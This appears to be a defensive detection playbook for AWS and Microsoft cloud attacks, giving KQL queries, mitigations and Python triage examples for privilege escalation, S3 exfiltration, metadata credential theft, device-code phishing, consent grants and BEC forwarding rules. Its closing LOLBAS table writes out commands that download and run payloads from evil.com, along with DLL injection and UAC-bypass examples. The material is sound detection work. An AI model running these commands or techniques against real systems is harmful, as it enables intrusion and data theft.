Summary: Rhino Security's 'AWS IAM Privilege Escalation' paper catalogs 20+ methods. Highest-fidelity detections: AttachUserPolicy, CreateLoginProfile, UpdateAssumeRolePolicy, PutUserPolicy.

Why this matters

AWS has dozens of IAM actions that effectively grant admin. If an attacker can call AttachUserPolicy with policy arn:aws:iam::aws:policy/AdministratorAccess, they immediately become admin. Same for CreatePolicyVersion with --set-as-default, or UpdateAssumeRolePolicy to add themselves as a principal to a high-privilege role. These events are rare in normal ops but common in attacks.

What to look for

CloudTrail `AttachUserPolicy`, `AttachRolePolicy`, `PutUserPolicy`, `PutRolePolicy`, `CreatePolicyVersion`, `CreateLoginProfile`, `UpdateLoginProfile`, `UpdateAssumeRolePolicy`, `CreateAccessKey` on another user. Especially suspicious when the action grants `*` or `iam:*` permissions.

KQL Any AttachUserPolicy/AttachRolePolicy granting AdministratorAccess
event.dataset:"aws.cloudtrail" and event.action:(AttachUserPolicy or AttachRolePolicy) and aws.cloudtrail.request_parameters:*AdministratorAccess*
KQL Creation of login profile on existing user (password added — backdoor setup)
event.dataset:"aws.cloudtrail" and event.action:"CreateLoginProfile"
KQL CreateAccessKey on a user OTHER than the caller (backdoor persistence)
event.dataset:"aws.cloudtrail" and event.action:"CreateAccessKey" and aws.cloudtrail.request_parameters:*userName*
-- A CreateAccessKey without userName targets the caller's own user; when userName is present, compare it with user.name
-- KQL cannot compare two fields, so finish that match in a transform, ES|QL, or a post-filter
KQL UpdateAssumeRolePolicy — attacker adding self to a trust policy
event.dataset:"aws.cloudtrail" and event.action:"UpdateAssumeRolePolicy"

🛡️ Mitigations

  • SCPs (Service Control Policies) at org level — deny iam:AttachUserPolicy to anyone except the IAM admin role
  • Use permissions boundaries — prevent self-elevation even if someone has iam:AttachUserPolicy
  • Alert on ALL writes to IAM policies, login profiles, and trust relationships
  • Implement just-in-time IAM access via tools like ConsoleMe / AWS Identity Center

🔧 Tools used by attackers / defenders

Pacu (iam__privesc_scan module), PMapper, Cloudsplaining
T1530

AWS S3 Data Exfiltration

HIGH [MITRE]

Summary: Attackers bulk-download S3 buckets, modify bucket policies for public exposure, or copy data cross-account.

Why this matters

S3 holds the data. Exfiltration happens three ways: (1) bulk GetObject calls to download everything, (2) modify bucket policy to allow '*' (public) and then download externally without auth, (3) cross-account replication to an attacker-controlled bucket. All three show in CloudTrail as specific event patterns.

What to look for

Spikes in `GetObject` API calls from a single identity (S3 data events must be enabled — off by default). `PutBucketPolicy` granting `Principal: '*'`. `PutBucketAcl` setting public-read or public-read-write. `PutBucketReplication` with cross-account destination. Unusual User-Agent like `s3cmd` or `rclone` from production workload identities.

KQL Bucket made public via policy change
event.dataset:"aws.cloudtrail" and event.action:"PutBucketPolicy" and aws.cloudtrail.request_parameters:*Principal*
-- Inspect the bucketPolicy in request_parameters for "Principal": "*" or {"AWS": "*"}; the quoted JSON cannot be matched reliably as a KQL wildcard term
KQL Cross-account replication configured — data flowing to attacker account
event.dataset:"aws.cloudtrail" and event.action:"PutBucketReplication"
-- Validate destination bucket is in an account on the organization allow-list
KQL GetObject burst — requires S3 data events enabled in CloudTrail
event.dataset:"aws.cloudtrail" and event.action:"GetObject"
-- Aggregate: count by user.name over 5min
-- Alert when count > 1000 (tune per baseline)

🛡️ Mitigations

  • Enable S3 Block Public Access at org level (IGNORE_PUBLIC_ACLS + RESTRICT_PUBLIC_BUCKETS)
  • Enable CloudTrail S3 data events on all sensitive buckets
  • Use S3 Access Analyzer — identifies buckets inadvertently made public
  • GuardDuty S3 protection — detects anomalous GetObject, suspicious IPs, TOR
  • Macie scanning for sensitive data in S3 — know what matters before attackers do

🔧 Tools used by attackers / defenders

Pacu (s3__download_bucket), awscli s3 sync, rclone, s3cmd
T1552.005

EC2 Instance Metadata Service Abuse (IMDSv1 SSRF)

CRITICAL [MITRE]

Summary: SSRF vulnerabilities in EC2-hosted apps + IMDSv1 = attacker steals instance IAM credentials via http://169.254.169.254/latest/meta-data/iam/security-credentials/.

Why this matters

The 2019 Capital One breach (100M records) was exactly this: Paige Thompson found an SSRF in a misconfigured WAF on an EC2 instance, used it to hit the metadata service, stole the instance role credentials, and used them to dump S3. IMDSv2 (token-based) fixes this but requires migration. ANY EC2 instance still on IMDSv1 is one SSRF vulnerability away from being a pivot point.

What to look for

CloudTrail events with `userIdentity.sessionContext.sessionIssuer.type = Role` and `sessionContext.attributes.mfaAuthenticated = false`, where the source IP is NOT the instance's IP (credentials used off-instance). `userAgent` strings indicating tools like Pacu or CLI when they should be from the application.

KQL Instance role credentials used from IP that's not the instance itself
event.dataset:"aws.cloudtrail" and user.roles:*EC2* and user.id:ASIA*
-- Correlate source.ip against known EC2 private/public IPs
-- Alert when source.ip is external
KQL Instance role used to call IAM or Organizations (lateral/privesc indicator)
event.dataset:"aws.cloudtrail" and user.id:ASIA* and event.provider:("iam.amazonaws.com" or "organizations.amazonaws.com")
AWS CLI (audit) Find instances still using IMDSv1
aws ec2 describe-instances \
  --query 'Reservations[].Instances[?MetadataOptions.HttpTokens==`optional`].[InstanceId, MetadataOptions.HttpTokens, MetadataOptions.HttpPutResponseHopLimit]' \
  --output table

🛡️ Mitigations

  • Enforce IMDSv2 on all EC2 instances (HttpTokens=required)
  • Launch templates must require IMDSv2
  • Set HttpPutResponseHopLimit=1 (blocks container workloads from reaching metadata)
  • GuardDuty finding: UnauthorizedAccess:IAMUser/InstanceCredentialExfiltrationOutsideAWS
  • VPC endpoints for AWS services — detect metadata creds being used externally

🔧 Tools used by attackers / defenders

Pacu (ec2__enum_eips, iam__enum_permissions), SSRFmap, manual curl + SSRF primitive
T1078.004

Cross-Account AssumeRole Abuse

HIGH [MITRE]

Summary: Attackers abuse overly permissive trust policies — or create new trust relationships — to assume roles in other AWS accounts within an organization.

Why this matters

Most organizations have multiple AWS accounts with IAM roles that trust each other (e.g., 'prod-read-role' in prod is trusted by 'security-audit-role' in security account). Misconfigured trust policies (Principal: *, or overly broad conditions) let anyone with the role ARN assume the role. Attackers enumerate trust relationships and pivot through the account graph.

What to look for

`AssumeRole` events where the source account differs from the destination. `AssumeRole` with `externalId` mismatches. New role creations with wildcard principals. Cross-account activity from an account not in your organization.

KQL AssumeRole from an external AWS account (not in your organization)
event.dataset:"aws.cloudtrail" and event.action:"AssumeRole"
-- Compare recipientAccountId vs userIdentity.accountId
-- Alert when source is not in org allow-list
KQL UpdateAssumeRolePolicy setting Principal to wildcard
event.dataset:"aws.cloudtrail" and event.action:"UpdateAssumeRolePolicy" and aws.cloudtrail.request_parameters:*Principal*
-- Inspect the policyDocument for "Principal": "*" or {"AWS": "*"}; the quoted JSON cannot be matched reliably as a KQL wildcard term
KQL Role chaining — one AssumeRole leading to another within minutes (privesc path)
event.dataset:"aws.cloudtrail" and event.action:"AssumeRole"
-- Correlate: same originating user, multiple AssumeRole calls chained in 10min
-- Attack pattern: A -> B -> C -> admin
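One triage routine, added here as an example and not part of the playbook, for the wildcard-principal checks on this card and on the S3 exfiltration card (PutBucketPolicy with `Principal: "*"`), together with the high-fidelity events the privilege escalation card lists (AttachUserPolicy with AdministratorAccess, CreateLoginProfile, CreateAccessKey on another user, UpdateAssumeRolePolicy). The records are constructed; the policy-document shapes follow how CloudTrail renders them (bucket policies as JSON objects, trust policies as JSON strings, sometimes URL-encoded), which is an assumption to validate against your own logs.

```python
"""Triage of high-fidelity IAM and S3 write events in CloudTrail.

Added example (not from the playbook). Records are constructed;
ADMIN_POLICY_ARN is the managed policy ARN quoted on the card.
"""
import json
from urllib.parse import unquote

ADMIN_POLICY_ARN = "arn:aws:iam::aws:policy/AdministratorAccess"


def _load_policy(doc):
    """CloudTrail carries bucket policies as JSON objects and trust policies as
    (sometimes URL-encoded) JSON strings; accept either (assumption, see lead-in)."""
    if isinstance(doc, str):
        doc = json.loads(unquote(doc))
    return doc or {}


def has_wildcard_principal(policy_doc):
    """True if any Allow statement grants access to Principal "*" or {"AWS": "*"}."""
    stmts = _load_policy(policy_doc).get("Statement", [])
    if isinstance(stmts, dict):          # a single statement may be a bare object
        stmts = [stmts]
    for s in stmts:
        if s.get("Effect") != "Allow":
            continue
        principal = s.get("Principal")
        if principal == "*":
            return True
        if isinstance(principal, dict):
            aws = principal.get("AWS", [])
            if "*" in ([aws] if isinstance(aws, str) else aws):
                return True
    return False


def caller_name(event):
    """Short name of the caller: IAM user name, or the last ARN segment for roles."""
    ident = event["userIdentity"]
    if ident.get("type") == "IAMUser":
        return ident.get("userName")
    return ident.get("arn", "").rsplit("/", 1)[-1]


def classify(event):
    """Return finding tags for one record; an empty list means nothing to flag."""
    name = event["eventName"]
    params = event.get("requestParameters") or {}
    tags = []
    if name in ("AttachUserPolicy", "AttachRolePolicy") and params.get("policyArn") == ADMIN_POLICY_ARN:
        tags.append("admin-policy-attached")
    if name == "CreateLoginProfile":
        tags.append("login-profile-created")
    # CreateAccessKey without userName targets the caller; any other name is a backdoor candidate.
    if name == "CreateAccessKey" and params.get("userName") not in (None, caller_name(event)):
        tags.append("access-key-for-other-user")
    if name == "UpdateAssumeRolePolicy":
        tags.append("trust-policy-changed")
        if has_wildcard_principal(params.get("policyDocument")):
            tags.append("wildcard-trust-policy")
    if name == "PutBucketPolicy" and has_wildcard_principal(params.get("bucketPolicy")):
        tags.append("public-bucket-policy")
    return tags


def triage(events):
    """(eventName, tags) for every record that produced at least one tag."""
    return [(ev["eventName"], classify(ev)) for ev in events if classify(ev)]


def _user(name):
    return {"type": "IAMUser", "userName": name, "arn": f"arn:aws:iam::111122223333:user/{name}"}


OPEN_TRUST = json.dumps({"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Principal": {"AWS": "*"}, "Action": "sts:AssumeRole"}]})
SAFE_BUCKET = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::111122223333:root"},
     "Action": "s3:GetObject", "Resource": "arn:aws:s3:::acme-data/*"}]}
PUBLIC_BUCKET = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Principal": "*", "Action": "s3:GetObject",
     "Resource": "arn:aws:s3:::acme-data/*"}]}

# Constructed sample records (only the fields the triage reads).
SAMPLE_EVENTS = [
    {"eventName": "AttachUserPolicy", "userIdentity": _user("bob"),
     "requestParameters": {"userName": "bob", "policyArn": ADMIN_POLICY_ARN}},
    {"eventName": "CreateAccessKey", "userIdentity": _user("bob"),
     "requestParameters": {"userName": "svc-backup"}},
    {"eventName": "CreateAccessKey", "userIdentity": _user("bob"),
     "requestParameters": {"userName": "bob"}},
    {"eventName": "UpdateAssumeRolePolicy", "userIdentity": _user("bob"),
     "requestParameters": {"roleName": "prod-read-role", "policyDocument": OPEN_TRUST}},
    {"eventName": "PutBucketPolicy", "userIdentity": _user("ops-deployer"),
     "requestParameters": {"bucketName": "acme-data", "bucketPolicy": SAFE_BUCKET}},
    {"eventName": "PutBucketPolicy", "userIdentity": _user("bob"),
     "requestParameters": {"bucketName": "acme-data", "bucketPolicy": PUBLIC_BUCKET}},
]

if __name__ == "__main__":
    for name, tags in triage(SAMPLE_EVENTS):
        print(f"{name}: {', '.join(tags)}")
```

The Deny-aware principal check matters: a bucket policy that mentions `"Principal": "*"` only inside a Deny statement is a hardening pattern, not an exposure, which is exactly the case the plain string match in the KQL above cannot distinguish.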

🛡️ Mitigations

  • All cross-account trust policies must require ExternalId condition
  • Use AWS Organization SCPs to restrict which accounts can assume which roles
  • IAM Access Analyzer External Access — finds all resources shared externally
  • Deny UpdateAssumeRolePolicy via SCP except from dedicated admin roles
  • Alert on AssumeRole chains (3+ role assumptions in a session)

🔧 Tools used by attackers / defenders

Pacu, PMapper (privilege mapping across accounts), awspx

🔷 Azure / M365 / Entra ID 5 cards

Microsoft cloud identity & productivity attack patterns — increasingly the target #1 in real intrusions. Sign-in anomalies, OAuth device-code phishing (the technique that bypasses MFA), illicit consent grants, Entra ID privilege escalation, and BEC mailbox forwarding rules. All queries written in Sentinel KQL syntax with Azure-specific log table names.

T1078.004

Entra ID Sign-in Anomalies

HIGH [MITRE]

Summary: Detect impossible travel, unfamiliar location, and atypical sign-in patterns from Entra ID sign-in logs.

Why this matters

Once an attacker has credentials (phishing, infostealer, credential stuffing), they authenticate to M365 from their own infrastructure. Entra ID's own 'Risky Sign-ins' feature catches obvious cases, but you can supplement with custom KQL for your specific environment — e.g., authentications from countries you don't operate in.

What to look for

Successful sign-ins where source IP country differs from user's normal pattern, sign-ins at unusual hours for that user, authentications from datacenter ASNs (OVH, DigitalOcean, M247) which are often attacker infrastructure, simultaneous sign-ins from distant locations (impossible travel).

KQL (Sentinel) Successful sign-in from a country never before seen for the user
let baseline_countries = dynamic(["US", "CA"]);   // replace with the countries you operate in
SigninLogs
| where ResultType == 0
| extend Country = tostring(LocationDetails.countryOrRegion)
| summarize Countries = make_set(Country), arg_max(TimeGenerated, *) by UserPrincipalName
| where array_length(Countries) > 1
| where Country !in (baseline_countries)
KQL (Sentinel) Sign-in from known hosting/VPN ASN — attacker infrastructure indicator
SigninLogs
| where ResultType == 0
| where AutonomousSystemNumber in (16276, 14061, 24940, 9009)  // OVH, DigitalOcean, Hetzner, M247
| project TimeGenerated, UserPrincipalName, IPAddress, AutonomousSystemNumber, AppDisplayName
KQL (Sentinel) Impossible travel — same user, two IPs in far-apart locations within 1 hour
SigninLogs
| where ResultType == 0
| summarize Locations = make_set(strcat(tostring(LocationDetails.countryOrRegion), ":", IPAddress), 10) by UserPrincipalName, bin(TimeGenerated, 1h)
| where array_length(Locations) > 1
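The impossible-travel calculation behind the last query, as an added Python example (not from the playbook and not Sentinel's built-in detection): consecutive successful sign-ins per user are compared by great-circle distance over elapsed time, and flagged when the implied speed is faster than a flight. Rows, IPs and coordinates are constructed, and the IP geolocation is assumed to have been done upstream.

```python
"""Impossible-travel check over Entra ID sign-in rows.

Added example (not from the playbook). Rows, IPs and coordinates are
constructed; the lat/lon columns stand in for an upstream IP geolocation step.
"""
import math
from datetime import datetime

MAX_KMH = 900.0      # faster than a commercial flight: physically impossible
MIN_KM = 100.0       # ignore small hops (mobile carrier vs office IP in one city)
EARTH_RADIUS_KM = 6371.0


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two WGS84 points."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi, dlam = p2 - p1, math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlam / 2) ** 2
    return 2 * EARTH_RADIUS_KM * math.asin(math.sqrt(a))


def impossible_travel(signins, max_kmh=MAX_KMH, min_km=MIN_KM):
    """Findings for consecutive successful sign-ins of one user that would
    require travelling faster than max_kmh between their IP locations."""
    rows = sorted((r for r in signins if r["ResultType"] == 0),
                  key=lambda r: (r["UserPrincipalName"], r["TimeGenerated"]))
    findings = []
    for prev, cur in zip(rows, rows[1:]):
        if prev["UserPrincipalName"] != cur["UserPrincipalName"] or prev["IPAddress"] == cur["IPAddress"]:
            continue
        km = haversine_km(prev["lat"], prev["lon"], cur["lat"], cur["lon"])
        # Floor the elapsed time at one minute so same-second sign-ins do not divide by zero.
        hours = max((cur["TimeGenerated"] - prev["TimeGenerated"]).total_seconds() / 3600, 1 / 60)
        if km >= min_km and km / hours > max_kmh:
            findings.append({"user": cur["UserPrincipalName"], "from_ip": prev["IPAddress"],
                             "to_ip": cur["IPAddress"], "km": round(km), "kmh": round(km / hours)})
    return findings


def _row(user, when, ip, lat, lon, result=0):
    return {"UserPrincipalName": user, "TimeGenerated": datetime.fromisoformat(when),
            "IPAddress": ip, "lat": lat, "lon": lon, "ResultType": result}


# Constructed sample: alice appears in Washington DC and then Frankfurt 40 minutes
# later; bob flies New York -> London over 7 hours; carol has only a failed sign-in.
SAMPLE_SIGNINS = [
    _row("alice@example.com", "2026-03-25T09:00:00", "203.0.113.10", 38.9, -77.0),
    _row("alice@example.com", "2026-03-25T09:40:00", "198.51.100.7", 50.1, 8.7),
    _row("bob@example.com", "2026-03-25T09:00:00", "203.0.113.20", 40.7, -74.0),
    _row("bob@example.com", "2026-03-25T16:00:00", "198.51.100.9", 51.5, -0.1),
    _row("carol@example.com", "2026-03-25T09:05:00", "198.51.100.77", 55.7, 37.6, result=50126),
]

if __name__ == "__main__":
    for f in impossible_travel(SAMPLE_SIGNINS):
        print(f"{f['user']}: {f['from_ip']} -> {f['to_ip']} {f['km']} km at {f['kmh']} km/h")
```

The minimum-distance floor is what keeps this from paging on a laptop that flips between office Wi-Fi and a phone hotspot; the speed ceiling is what separates a real flight (bob) from a stolen session (alice).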

🛡️ Mitigations

  • Enable Entra ID Protection (P2 license) — automated risky sign-in detection
  • Require MFA with Conditional Access — block legacy authentication entirely
  • Block sign-ins from countries you don't operate in (CA named locations)
  • Require compliant or hybrid-joined devices for privileged roles
  • Monitor Risky Users report weekly

🔧 Tools used by attackers / defenders

AADInternals, ROADtools, evilginx2 (attacker), Microsoft Entra ID Protection (defender)
T1566.002

Device Code Phishing

HIGH [MITRE]

Summary: Attackers initiate a device code flow on their own device, trick the victim into entering the code, receive valid tokens that bypass MFA entirely.

Why this matters

OAuth 2.0 device code flow is designed for input-constrained devices (smart TVs, IoT). The attacker initiates the flow, sends the victim a legitimate Microsoft URL (microsoft.com/devicelogin) along with a code. The victim logs in normally, approves the 'device', and the attacker receives a valid access+refresh token. MFA is completed by the victim — tokens are given to the attacker. This is devastating because the phish looks entirely legitimate (real Microsoft URL, real login flow).

What to look for

Sign-in logs where `AuthenticationProtocol = deviceCode`. Token activity from Azure resource types that the user doesn't normally access. Refresh token usage from IP addresses that differ from the initial device code sign-in.

KQL (Sentinel) Device code authentication — review ALL of these
SigninLogs
| where AuthenticationProtocol == "deviceCode"
| project TimeGenerated, UserPrincipalName, IPAddress, AppDisplayName, ResourceDisplayName
| sort by TimeGenerated desc
KQL (Sentinel) Device code sign-in followed by token use from different IP
let deviceCode = SigninLogs | where AuthenticationProtocol == "deviceCode" | project UserPrincipalName, OriginalIP = IPAddress, DeviceCodeTime = TimeGenerated;
SigninLogs
| where AuthenticationProtocol != "deviceCode"
| join kind=inner deviceCode on UserPrincipalName
| where IPAddress != OriginalIP
| where TimeGenerated between (DeviceCodeTime .. DeviceCodeTime + 24h)

🛡️ Mitigations

  • Conditional Access: block device code flow entirely unless business-justified
  • For organizations that must allow it: restrict to specific apps and trusted locations
  • User awareness training specifically for device code phishing (it bypasses 'never click links' advice)
  • Deploy token protection via Conditional Access (preview feature as of late 2024)

🔧 Tools used by attackers / defenders

TokenTactics, ROADtools roadtx, AADInternals Invoke-AADIntPhishing
T1528

Illicit OAuth Consent Grant

CRITICAL [MITRE]

Summary: Attacker tricks user into granting OAuth permissions to a malicious app — app now reads mail, files, calendars without needing the user's password.

Why this matters

This bypasses password changes, MFA, and device resets. Once a user approves (consents to) a malicious OAuth app with Mail.Read + Files.Read, the app retains access via refresh tokens even if the user changes their password. The attacker never sees the password — they just have an ongoing API access grant. Rebuilding trust requires revoking the app grant, which many incident responders forget to do.

What to look for

Audit events for `Consent to application`. New enterprise apps registered. Apps with permissions like `Mail.ReadWrite`, `Files.ReadWrite.All`, `offline_access` (refresh token), `Directory.Read.All`. App names that mimic legitimate ones (e.g., '0ffice365 Login' with a zero).

KQL (Sentinel) User consented to an OAuth app — review permissions granted
AuditLogs
| where OperationName == "Consent to application"
| extend AppName = tostring(TargetResources[0].displayName)
| extend Permissions = tostring(TargetResources[0].modifiedProperties)
| project TimeGenerated, InitiatedBy, AppName, Permissions
| where Permissions has_any ("Mail.Read", "Mail.ReadWrite", "Files.Read", "Files.ReadWrite", "Directory.Read")
KQL (Sentinel) New service principal created with suspicious reply URL
AuditLogs
| where OperationName == "Add service principal"
| extend AppName = tostring(TargetResources[0].displayName)
| extend ReplyUrls = tostring(TargetResources[0].modifiedProperties)
| where ReplyUrls has_any ("ngrok", "localhost", "heroku", "azurewebsites")

🛡️ Mitigations

  • DISABLE user consent to apps (Entra → Enterprise apps → Consent and permissions → Do not allow user consent)
  • Implement admin consent workflow for all OAuth app grants
  • Use 'Verified Publisher' requirement on consent policies
  • Monitor for new enterprise app registrations daily
  • Quarterly review of all consented apps — revoke unused/suspicious ones

🔧 Tools used by attackers / defenders

365-Stealer (attacker), Illicit consent grant attack simulator, Microsoft MCAS/Defender for Cloud Apps (defender)
T1098.003

Entra ID Privilege Escalation

CRITICAL [MITRE]

Summary: Adding users to privileged roles (Global Admin, Privileged Role Admin, Application Admin), creating backdoor admins.

Why this matters

Once initial access is obtained in M365, the attacker's goal is elevating to Global Admin or a role that effectively grants it (Privileged Role Administrator, Application Administrator, Cloud Application Administrator — all have paths to GA). Any role assignment to these should be treated as critical.

What to look for

Audit logs for `Add member to role` or `Add eligible member to role` targeting high-privilege roles. Creation of new Global Admins. Modification of role-assignable groups.

KQL (Sentinel) Any addition to a sensitive Entra ID role
AuditLogs
| where OperationName has_any ("Add member to role", "Add eligible member to role")
| extend RoleName = tostring(TargetResources[0].modifiedProperties[1].newValue)
| where RoleName has_any ("Global Administrator", "Privileged Role Administrator", "Application Administrator", "Cloud Application Administrator", "Privileged Authentication Administrator", "User Administrator", "Exchange Administrator", "SharePoint Administrator")
| project TimeGenerated, InitiatedBy, TargetResource = TargetResources[0].userPrincipalName, RoleName
KQL (Sentinel) Creation of new app registration with high-privilege API permissions
AuditLogs
| where OperationName == "Update application"
| where TargetResources contains "RequiredResourceAccess"
| extend Permissions = tostring(TargetResources[0].modifiedProperties)
| where Permissions has_any ("Directory.ReadWrite.All", "User.ReadWrite.All", "RoleManagement.ReadWrite.Directory")

🛡️ Mitigations

  • Use Privileged Identity Management (PIM) — just-in-time role activation, not permanent
  • Require MFA and approval for GA activation
  • Hard-cap Global Admins at 3-5 emergency accounts
  • Alert on every GA addition (should be very rare)
  • Review role assignments quarterly

🔧 Tools used by attackers / defenders

ROADtools, AzureHound, Stormspotter
T1114.003

Malicious Mailbox Forwarding Rules

HIGH [MITRE]

Summary: Attackers create inbox rules that forward incoming mail to an external address — persistent, invisible data theft that survives password resets.

Why this matters

This is the #1 BEC (Business Email Compromise) technique. After phishing a finance team member, attacker creates a rule: 'Forward any email containing "invoice" or "wire transfer" to attacker@example.com, then mark as read, then delete from inbox.' The victim never sees the replies. Auto-forwarding to external addresses is disabled by default in M365 as of 2021, but rules can still be abused if scoped internally or if the org has exceptions.

What to look for

`New-InboxRule` or `Set-InboxRule` events in Exchange. Rules with `ForwardTo`, `ForwardAsAttachmentTo`, or `RedirectTo` set to external addresses. Rules with `DeleteMessage` or `MarkAsRead` flags that hide the forwarded mail. Suspicious subject filters like 'invoice', 'payment', 'wire', 'HR'.

KQL (Sentinel) New inbox rule with external forwarding
OfficeActivity
| where Operation in ("New-InboxRule", "Set-InboxRule", "UpdateInboxRules")
| mv-expand Param = parse_json(Parameters)   // Parameters is an array of {Name, Value} pairs in no fixed order
| where tostring(Param.Name) in ("ForwardTo", "ForwardAsAttachmentTo", "RedirectTo")
| project TimeGenerated, UserId, Operation, Parameter = tostring(Param.Name), Target = tostring(Param.Value)
KQL (Sentinel) Inbox rules with suspicious subject keywords (BEC pattern)
OfficeActivity
| where Operation contains "InboxRule"
| extend RuleBody = tostring(Parameters)
| where RuleBody has_any ("invoice", "payment", "wire", "bank", "ACH", "HR", "payroll", "confidential")
| where RuleBody has_any ("Delete", "MarkAsRead", "MoveToFolder")
PowerShell (audit) Enumerate all inbox rules across the tenant
Connect-ExchangeOnline
Get-Mailbox -ResultSize Unlimited | ForEach-Object {
    # Capture the mailbox before the inner pipeline rebinds $_ to the rule object
    $mbx = $_.UserPrincipalName
    Get-InboxRule -Mailbox $mbx | Where-Object {
        $_.ForwardTo -or $_.ForwardAsAttachmentTo -or $_.RedirectTo
    } | Select-Object @{N="Mailbox";E={$mbx}}, Name, ForwardTo, ForwardAsAttachmentTo, RedirectTo, DeleteMessage
} | Export-Csv -Path "inbox_forwarding_rules.csv" -NoTypeInformation
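The rule inspection described in "What to look for", as an added Python example (not from the playbook) over OfficeActivity-style records: the `Parameters` field is parsed as the `{Name, Value}` array it is, forwarding targets are pulled out by parameter name, external domains are separated from the tenant's own, and the hide-the-evidence flags and BEC subject keywords from the card feed a severity. Records, addresses, the recipient formats and the tenant domain list are constructed.

```python
"""Flag inbox rules that forward mail externally or hide what they forward.

Added example (not from the playbook). Records, addresses and the tenant
domain are constructed; the recipient string formats are assumptions.
"""
import json
import re

INTERNAL_DOMAINS = {"example.com"}                  # constructed: the tenant's own domains
FORWARD_PARAMS = ("ForwardTo", "ForwardAsAttachmentTo", "RedirectTo")
HIDE_PARAMS = ("DeleteMessage", "MarkAsRead", "MoveToFolder")
BEC_KEYWORDS = ("invoice", "payment", "wire", "bank", "ach", "hr", "payroll", "confidential")
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")


def params_by_name(record):
    return {p["Name"]: p["Value"] for p in json.loads(record["Parameters"])}


def is_external(address):
    return address.rsplit("@", 1)[-1].lower() not in INTERNAL_DOMAINS


def assess_rule(record):
    """Return a finding dict for an inbox-rule record, or None for other operations."""
    if "InboxRule" not in record["Operation"]:
        return None
    p = params_by_name(record)
    # Recipient values may be "Name <addr>", "Name [SMTP:addr]" or bare addresses,
    # possibly ';'-separated; extracting every SMTP address covers all of them.
    targets = [a.lower() for k in FORWARD_PARAMS if k in p for a in EMAIL_RE.findall(str(p[k]))]
    external = [a for a in targets if is_external(a)]
    hides = [k for k in HIDE_PARAMS
             if k in p and (k == "MoveToFolder" or str(p[k]).lower() in ("true", "1"))]
    words = set(re.findall(r"[a-z]+", " ".join(str(v) for v in p.values()).lower()))
    keywords = [w for w in BEC_KEYWORDS if w in words]   # whole-word match, so "ach" != "attacker"
    if external and hides:
        severity = "high"        # exfiltrate and cover tracks: the classic BEC rule
    elif external or (hides and keywords):
        severity = "medium"
    else:
        severity = "low"
    return {"user": record["UserId"], "operation": record["Operation"], "rule": p.get("Name"),
            "external_targets": external, "hides": hides, "keywords": keywords, "severity": severity}


def _record(op, user, params):
    return {"Operation": op, "UserId": user,
            "Parameters": json.dumps([{"Name": k, "Value": v} for k, v in params])}


# Constructed sample: a BEC-style rule on a finance mailbox, a benign internal
# forward, and an unrelated mailbox-access event.
SAMPLE_RECORDS = [
    _record("New-InboxRule", "finance@example.com", [
        ("Name", "Invoice sync"),
        ("SubjectContainsWords", "invoice;wire transfer;payment"),
        ("ForwardTo", "Mailer [SMTP:mailer@attacker-mail.test]"),
        ("DeleteMessage", "True"),
        ("MarkAsRead", "True"),
    ]),
    _record("Set-InboxRule", "alice@example.com", [
        ("Name", "Team updates"),
        ("ForwardTo", "Bob <bob@example.com>"),
    ]),
    _record("MailItemsAccessed", "alice@example.com", []),
]

if __name__ == "__main__":
    for rec in SAMPLE_RECORDS:
        finding = assess_rule(rec)
        if finding:
            print(f"[{finding['severity'].upper()}] {finding['user']} rule '{finding['rule']}' "
                  f"-> {finding['external_targets'] or 'internal'} hides={finding['hides']}")
```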

🛡️ Mitigations

  • Default-deny external auto-forwarding (Exchange Online policy, Microsoft made this default in 2021)
  • Alert on ANY new inbox rule with ForwardTo/RedirectTo property
  • Enable Mailbox Auditing (should be on by default for E5)
  • For privileged users (finance, HR, executives): require admin approval for any new rule
  • Enable Defender for Office 365 — catches forwarding rules as part of anti-phishing policy

🔧 Tools used by attackers / defenders

ROADtools roadrecon, Microsoft Graph (attacker: msgraph mailFolders/inbox/messageRules), Defender for O365 (defender)

⚙️ LOLBAS Reference 24 binaries

Living Off the Land Binaries And Scripts — built-in Windows binaries adversaries weaponize to avoid dropping malware. Filterable, searchable table with category, abuse description, example command, and detection KQL. Each row links to the full lolbas-project.io entry. Use the search box to find specific binaries or attack patterns.

Binary | Category | Abuse | Example Command | Detection KQL
certutil.exe | Download | Download remote file | certutil.exe -urlcache -split -f http://evil.com/pay.exe pay.exe | process.name:"certutil.exe" and process.command_line:(*"-urlcache"* or *"-f -split"*)
bitsadmin.exe | Download | BITS transfer of remote file | bitsadmin /transfer job /download http://evil.com/pay.exe C:\temp\pay.exe | process.name:"bitsadmin.exe" and process.command_line:*"/transfer"*
curl.exe | Download | Download file (Win10 1803+) | curl -o pay.exe http://evil.com/pay.exe | process.name:"curl.exe" and process.command_line:(*"-o "* or *"--output "*)
powershell.exe | Download | Net.WebClient DownloadString | powershell -c (New-Object Net.WebClient).DownloadString('http://evil.com/p') | process.name:"powershell.exe" and process.command_line:(*"DownloadString"* or *"DownloadFile"* or *"Invoke-WebRequest"*)
mshta.exe | Download | Execute HTA from URL | mshta.exe http://evil.com/pay.hta | process.name:"mshta.exe" and process.command_line:(*http* or *https*)
regsvr32.exe | Execute | Squiblydoo — execute scriptlet | regsvr32 /s /n /u /i:http://evil.com/x.sct scrobj.dll | process.name:"regsvr32.exe" and process.command_line:(*"scrobj.dll"* or *"/i:http"*)
rundll32.exe | Execute | Run arbitrary DLL export | rundll32.exe shell32.dll,ShellExec_RunDLL calc.exe | process.name:"rundll32.exe" and process.command_line:(*"javascript:"* or *"ShellExec"* or *"LaunchINFSection"*)
installutil.exe | Execute | Install & execute .NET assembly | InstallUtil.exe /logfile= /LogToConsole=false /U payload.exe | process.name:"InstallUtil.exe"
msbuild.exe | Execute | Compile & run C# from XML proj | msbuild.exe evil.csproj | process.name:"MSBuild.exe" and not process.parent.name:("devenv.exe" or "VsDebugConsole.exe")
mavinject.exe | Execute | Inject DLL into process | mavinject.exe <PID> /INJECTRUNNING evil.dll | process.name:"mavinject.exe" and process.command_line:*"/INJECTRUNNING"*
cmstp.exe | Execute / UAC Bypass | Bypass UAC via INF | cmstp.exe /s evil.inf | process.name:"cmstp.exe" and process.command_line:*".inf"*
